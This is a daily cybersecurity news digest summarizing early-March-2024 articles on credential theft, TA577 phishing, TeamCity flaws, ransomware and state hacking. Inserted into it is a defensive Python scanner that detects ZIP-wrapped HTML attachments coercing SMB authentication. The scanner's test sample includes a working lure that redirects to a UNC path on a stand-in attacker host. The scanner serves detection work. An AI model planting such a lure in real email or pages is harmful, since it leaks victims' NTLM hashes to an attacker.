Daily Brief
Find articles below, see 'DETAILS' for generated summaries
| Published | Source | Category | Title | Summary | Details |
|---|---|---|---|---|---|
| 2024-03-05 10:45:08 | thehackernews | DATA BREACH | Over 225K ChatGPT Credentials Sold on Dark Web | Over 225,000 OpenAI ChatGPT login credentials have been sold on dark web markets.
The credentials theft was linked to malware families LummaC2, Raccoon, and RedLine.
A 36% increase in compromised ChatGPT accounts was observed from June to October 2023 compared to the first five months of the year.
The surge in stolen credentials coincides with nation-state actors' interest in using AI and LLMs for cyberattacks.
Cybercriminals are targeting devices with access to AI systems, using stolen data for espionage and conducting attacks.
The misuse of valid account information has become a primary method for gaining initial access, complicating identity and access management for defenders.
IBM X-Force warns that enterprise credentials can be stolen via credential reuse, browser credential stores, or from enterprise accounts accessed on personal devices. | Details |
| 2024-03-05 10:29:26 | thehackernews | CYBERCRIME | Sophisticated Phishing Scam Steals Credentials via Email Thread Hijacking | TA577, a notorious threat actor, has been found utilizing ZIP archives in phishing emails to pilfer NTLM hashes.
Two significant campaigns were detected on February 26 and 27, 2024, targeting hundreds of organizations with thousands of messages worldwide.
The phishing strategy involves hijacking existing email threads and attaching ZIP files containing HTML files that force the recipient's machine to connect to an actor-controlled SMB server.
The HTML attachments capture NTLMv2 challenge/response pairs (Net-NTLMv2). These are not the NT hashes needed for pass-the-hash; they can be cracked offline to recover passwords or relayed to services that do not require signing, either of which can give the attacker unauthorized network access and data.
TA577, also known as Water Curupira, is proficient in distributing advanced malware and has a history of rapidly adopting new cyberattack techniques.
Proofpoint highlights TA577's agility in adapting to the cybersecurity landscape, continuously evolving methods to evade detection.
To mitigate the risk, organizations are advised to block outbound SMB (TCP 445) at the network edge so the coerced authentication never reaches the attacker's server. | Details |
| 2024-03-05 09:33:17 | theregister | DATA BREACH | Charity Penalized for Sending Unauthorized Solicitation Texts | Penny Appeal, a charity aiding crisis-hit countries, ordered by ICO to stop sending unsolicited texts.
Charity found to have sent over 460,000 spam texts in ten days, violating recipients' consent.
ICO received 354 complaints, with recipients reporting ignored opt-out requests and intrusive messaging.
Penny Appeal's failure to heed prior warnings resulted in an ICO investigation exposing a flawed database practice.
The charity failed to log opt-out requests, messaging individuals who had interacted within the past five years.
ICO stresses the importance of valid consent for marketing communications, regardless of the organization's size.
This is not the first instance of a charity facing ICO scrutiny; larger charities have previously been fined.
The ICO's action highlights the ongoing responsibility for all entities, including non-profits, to comply with direct marketing laws. | Details |
| 2024-03-05 03:41:48 | thehackernews | CYBERCRIME | Critical Vulnerabilities in JetBrains TeamCity Lead to Urgent Patch | Newly disclosed security vulnerabilities in JetBrains TeamCity could allow attackers to take over servers.
The identified flaws, CVE-2024-27198 and CVE-2024-27199, have been fixed in the latest TeamCity version.
Attackers exploiting these vulnerabilities could bypass authentication and potentially compromise a server, facilitating supply chain attacks.
Rapid7, a cybersecurity firm, discovered and reported the flaws: an authentication bypass and a path traversal issue.
TeamCity Cloud has already been patched, but on-premises installations require an immediate update.
Prior vulnerabilities in TeamCity have seen exploitation by threat actors from North Korea and Russia, highlighting the risks of delay in patching.
JetBrains urges users to update their TeamCity servers to mitigate the risk of exploitation. | Details |
| 2024-03-05 01:34:33 | theregister | DDOS | Cloudflare Introduces AI-Specific Firewall to Combat DDoS and Data Leaks | Cloudflare has enhanced its web application firewall (WAF) to include protections specifically designed for applications utilizing large language models (LLMs).
The service, known as "Firewall for AI," aims to prevent DDoS attacks and the leakage of sensitive data from LLM applications.
Features include Advanced Rate Limiting, which caps the number of requests from a single IP or API key, and Sensitive Data Detection, geared towards identifying and preventing private information from being exposed.
Clients will be able to create tailored fingerprints to control what their models reveal, with plans to introduce a beta version of prompt validation to defend against prompt injection attacks.
This new firewall offering can be applied to any LLM, regardless of whether it's hosted on Cloudflare Workers AI or other platforms, as long as the traffic is proxied through Cloudflare.
Cloudflare's move is a response to security concerns in AI as more companies integrate LLMs into their products, highlighting the need for specialized AI security measures. | Details |
| 2024-03-04 23:07:03 | theregister | DATA BREACH | American Express Customer Data Leaked Through Vendor Error | A security lapse at a third-party service provider resulted in the exposure of American Express cardholder information, including card numbers and expiry dates.
The breach involved personal data of an undisclosed number of American Express customers but did not compromise American Express's own systems.
American Express's chief privacy officer, Anneke Covell, alerted affected customers through a letter advising of the potential compromise of their card account information.
The state of Massachusetts publicized the incident, noting that American Express has filed 16 breach notifications with the state this year.
Past data breaches reported involved single-digit numbers of Massachusetts residents and were often due to compromised individual merchants or data found online by law enforcement.
American Express assures customers that they will not be held liable for fraudulent charges and advises customers to monitor their accounts and enable alerts for suspicious activities. | Details |
| 2024-03-04 22:46:15 | bleepingcomputer | MALWARE | Critical TeamCity Vulnerability Risk: Immediate Patching Recommended | A severe security vulnerability (CVE-2024-27198) has been identified in JetBrains’ TeamCity On-Premises software, enabling attackers to gain administrative control of the server without authentication.
Administrators are urged to promptly upgrade to TeamCity version 2023.11.4 or apply a security patch plugin, as full exploit details are public.
The JetBrains update also resolves a secondary vulnerability (CVE-2024-27199), which permitted alteration of certain system settings by unauthenticated users.
Both vulnerabilities affect the web component of all on-premises TeamCity versions prior to the fix, posing potential risks for supply chain attacks.
Cybersecurity firm Rapid7 demonstrated exploitability by chaining the authentication bypass into a working exploit that yields a shell on a TeamCity server.
The less severe vulnerability could potentially be exploited to execute DoS attacks or intercept client connections if the attacker is already on the network.
While the TeamCity cloud service has been patched, all unpatched on-premises installations remain vulnerable, and threat actors are anticipated to exploit these weaknesses imminently. | Details |
| 2024-03-04 22:15:32 | bleepingcomputer | NATION STATE ACTIVITY | Kimsuky APT Exploits ScreenConnect Flaws to Deploy ToddleShark Malware | North Korean state-sponsored hacking group Kimsuky is utilizing flaws in ScreenConnect to deploy ToddleShark malware for espionage.
ConnectWise earlier urged ScreenConnect users to update servers to patch vulnerabilities CVE-2024-1708 and CVE-2024-1709.
ToddleShark uses polymorphism and legitimate Microsoft binaries to evade detection and achieve persistence for continuous data theft.
The malware modifies registry settings, schedules tasks, and gathers system information to be sent to the hackers' C2 infrastructure.
Kroll's cybersecurity intelligence report indicates ToddleShark's evasion techniques and ties it to previously known Kimsuky backdoors BabyShark and ReconShark.
Kroll is set to release specific details and indicators of compromise related to ToddleShark in an upcoming blog post. | Details |
| 2024-03-04 21:49:52 | bleepingcomputer | CYBERCRIME | TA577 Group Phishing Campaign Targets Windows NTLM Hashes | Hackers from TA577 are using phishing emails to steal Windows NTLM authentication hashes, enabling account hijacking.
Two recent waves of attacks on February 26 and 27, 2024, specifically targeted employees' hashes at hundreds of organizations worldwide.
Captured NTLM hashes can facilitate unauthorized access to accounts, sensitive data, and lateral movement within networks.
The phishing emails contained ZIP archives with HTML files designed to silently connect to an attacker-controlled SMB server and capture the NTLM hashes sent during authentication.
Proofpoint's report notes that the emails carry no malware payload; the sole objective of these campaigns is to gather NTLM hashes.
Proofpoint also notes that the captured hashes are most useful against accounts without multi-factor authentication, and that they may serve as reconnaissance to identify high-value targets.
Recommended defensive measures include blocking outbound SMB connections, filtering emails that carry zipped HTML files, and enabling the Windows Group Policy setting "Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers". | Details |
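The two TA577 items above describe the same lure: a ZIP attachment whose HTML member points the browser at a `file://` or `\\host` UNC path, which makes Windows authenticate to the attacker's SMB server. The following is an added example (not code from Proofpoint or from this brief) of a mail-gateway style check for that pattern. It opens a ZIP in memory, pulls every fetchable reference out of each HTML member (meta refresh, `src`, `href`, `action`, `data`), and reports those that resolve to a remote UNC host rather than an `http(s)` URL or a local file path. The function names, the sample lure, and the 203.0.113.10 address are all constructed for this example.

```python
"""Flag ZIP-wrapped HTML attachments that coerce an outbound SMB/NTLM authentication.

Added example: not part of the original brief or of any vendor report.
"""
import io
import re
import zipfile
from html.parser import HTMLParser

_SCHEME_RE = re.compile(r"^[a-z][a-z0-9+.\-]*:")
_UNC_RE = re.compile(r"^[\\/]{2,}([A-Za-z0-9.\-]+)(?:[\\/]|$)")
_META_URL_RE = re.compile(r"url\s*=\s*['\"]?([^'\";]+)", re.IGNORECASE)


def remote_unc_host(ref: str):
    """Return the host of a reference that would trigger an SMB connection, else None.

    Accepted: file://host/..., file://\\host\..., \\host\share.
    Rejected: http(s)/mailto/javascript URLs, file:///C:/local paths, scheme-relative //host
    (which a browser resolves as http(s)), and localhost.
    """
    r = ref.strip()
    low = r.lower()
    if low.startswith("file:"):
        r = r[5:]
    elif _SCHEME_RE.match(low):
        return None          # some other scheme: not an SMB coercion
    elif not r.startswith("\\\\"):
        return None          # bare "//host" is scheme-relative http(s)
    m = _UNC_RE.match(r)
    if not m or m.group(1).lower() in ("localhost", "127.0.0.1"):
        return None
    return m.group(1)


class _RefCollector(HTMLParser):
    """Collect attribute values that cause the browser to fetch something."""

    def __init__(self):
        super().__init__()
        self.refs = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "meta" and (a.get("http-equiv") or "").lower() == "refresh":
            m = _META_URL_RE.search(a.get("content") or "")
            if m:
                self.refs.append(m.group(1))
        for key in ("src", "href", "action", "data"):
            if a.get(key):
                self.refs.append(a[key])


def scan_zip_attachment(zip_bytes: bytes, max_member_size: int = 5_000_000):
    """Return [(member_name, host), ...] for HTML members that reference a remote UNC host."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if not info.filename.lower().endswith((".html", ".htm")):
                continue
            if info.file_size > max_member_size:
                continue     # do not inflate oversized members (zip-bomb guard)
            text = zf.read(info).decode("utf-8", errors="replace")
            collector = _RefCollector()
            collector.feed(text)
            for ref in collector.refs:
                host = remote_unc_host(ref)
                if host:
                    findings.append((info.filename, host))
    return findings


def build_sample_zip() -> bytes:
    """Constructed sample: one lure HTML (meta refresh to a UNC path) and one benign HTML."""
    lure = ('<html><head><meta http-equiv="refresh" '
            'content="0; url=file://\\\\203.0.113.10\\share\\invoice\\"></head>'
            '<body>Loading thread...</body></html>')
    benign = ('<html><body><a href="https://example.com/">link</a>'
              '<img src="//cdn.example.com/x.png"></body></html>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Reply_2024-02-26.html", lure)
        zf.writestr("readme.html", benign)
    return buf.getvalue()


if __name__ == "__main__":
    for member, host in scan_zip_attachment(build_sample_zip()):
        print(f"SMB coercion: {member} -> \\\\{host}")
```

Flagging at the gateway complements the network controls the brief lists: even if a lure gets through, blocking outbound TCP 445 and restricting outgoing NTLM keeps the authentication from ever reaching the attacker's listener.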
| 2024-03-04 21:03:55 | theregister | CYBERCRIME | ALPHV Ransomware Group Suspected of $22M Bitcoin Ransom Theft | ALPHV/BlackCat, a ransomware gang, is linked to receiving a $22 million ransom payment in Bitcoin possibly connected to the Change Healthcare cyberattack.
The payment was detected by Recorded Future analyst Dmitry Smilyanets, observing a 350 Bitcoin transaction to a wallet tied to ALPHV.
Change Healthcare, an IT provider for over 70,000 US pharmacies and hospitals, suffered a major BlackCat ransomware attack impacting prescription processing.
Questions to Change’s parent company, UnitedHealth Group, about the ransom payment remained unanswered, with a focus on ongoing investigation cited.
The ransomware attack disrupted services across multiple pharmacies, including CVS and Walgreens, with systems needing to go offline due to the incident.
ALPHV reportedly kept the ransom rather than paying out the affiliate that carried out the intrusion, raising questions about trust within ransomware operations.
The affiliate claims to still hold 4TB of sensitive data from Change Healthcare and its partners and threatens to leak it unless it is paid.
The situation illustrates the lack of "honor among thieves" and serves as a warning about the risks and reliability within cybercrime affiliate networks. | Details |
| 2024-03-04 20:02:45 | theregister | NATION STATE ACTIVITY | North Korean Spies Accused of Stealing Chip Designs from South Korea | North Korean operatives allegedly infiltrated servers of South Korean chipmakers to steal product designs, aiding their home semiconductor industry development.
Seoul's National Intelligence Service reported ongoing cyber-espionage activities aimed at semiconductor equipment makers since last year.
Attackers utilized "living off the land" tactics by employing legitimate administrative tools to evade detection while conducting cyber operations.
The intrusions resulted in the theft of product design drawings and facility photos, with at least two known companies affected in December and February.
The South Korean spy agency is working closely with victimized firms to strengthen defenses and has informed all national semiconductor entities of potential threats.
The announcement aligns with recent warnings about North Korean cybercriminals targeting global defense technologies and conducting elaborate social engineering operations.
South Korea links these espionage efforts to the North's struggle to acquire technology due to international sanctions and the increased demand for semiconductors in their weapons programs. | Details |
| 2024-03-04 17:49:47 | theregister | NATION STATE ACTIVITY | German Defense Communications Tapped, Leaked by Russian Entities | A recording of a sensitive German defense call discussing Ukraine was intercepted and leaked by Russian media.
The leak was confirmed by the German Ministry of Defense and involved conversations on the Cisco WebEx platform.
High-level officials speculate the leak could have resulted from a Russian agent in the call or a flaw in the implementation of WebEx.
The audio disclosure has led to allegations by Russia of Germany's intent to secretly aid Ukraine with Taurus missile deliveries.
German officials fear Russia may have more intercepted recordings and that this leak is a strategic effort to influence Germany's military aid to Ukraine.
Russian officials have made provocative statements, accusing Germany of becoming an enemy and preparing for war, escalating tensions further.
The German government is treating the incident as a serious security breach and as an act of "information war" aimed at disinformation and division.
The Bundeswehr is investigating the incident, while the defense minister has publicly denounced the leak as a hybrid disinformation attack. | Details |
| 2024-03-04 17:49:46 | bleepingcomputer | CYBERCRIME | BlackCat Ransomware Allegedly Defrauds Affiliate of $22 Million | BlackCat ransomware group has abruptly shut down its servers, stirring speculation about its motives.
Allegations have been made that BlackCat scammed its own affiliate out of a $22 million ransom received from Optum after an attack on Change Healthcare.
Despite the shutdown of their leak blog and negotiation sites, the group's final message remains cryptic, merely stating "Everything is off, we decide."
The aggrieved affiliate claims to still possess 4TB of sensitive Optum data, threatening broader impacts on healthcare and insurance companies.
Optum's parent company, UnitedHealth Group, has chosen not to comment on the ransom payment allegations, focusing instead on ongoing investigations.
BlackCat, which has rebranded multiple times from DarkSide to BlackMatter, had previously been hit by law enforcement, and now there are hints that either an exit scam or another rebranding could be underway. | Details |
| 2024-03-04 17:44:25 | bleepingcomputer | DATA BREACH | American Express Notifies Cardholders of Third-Party Processor Breach | American Express has issued warnings to customers about a data breach involving one of their merchant processors, leading to the exposure of card information.
The breach resulted in the unauthorized access of American Express Card members' data, including account numbers, names, and expiration dates, but not through a compromise of American Express' systems.
The specifics regarding the number of affected customers, the identity of the compromised merchant processor, and the timing of the breach remain undisclosed.
American Express has commenced an investigation, alerted regulatory authorities, and is in the process of notifying impacted customers in compliance with legal requirements.
Customers are advised to monitor their statements for the next 12 to 24 months, report any suspicious transactions, and enable instant notifications in the American Express app.
American Express reassures clients that they will not be held liable for any fraudulent charges made with their cards and suggests requesting a new card if their information was compromised. | Details |
| 2024-03-04 15:41:56 | bleepingcomputer | NATION STATE ACTIVITY | Ukraine Allegedly Penetrates Russian Defense Ministry Servers | The Main Intelligence Directorate (GUR) of Ukraine's Ministry of Defense has announced a breach of the Russian Ministry of Defense (Minoborony) servers.
Classified documents purportedly obtained in the cyber operation include sensitive national security details.
The "special operation" is said to have been significantly aided by a key minister, Vadimovich, though the announcement gives little context about that person's role or identity.
Ukrainian officials released screenshots allegedly from the hacked databases as proof of the successful attack.
The legitimacy of the screenshots has not been independently verified by third parties, and the Russian Ministry of Defense has not yet released a statement.
The GUR has previously claimed responsibility for cyberattacks on other Russian entities but did not indicate any destructive actions, such as data deletion, in this particular incident with Minoborony. | Details |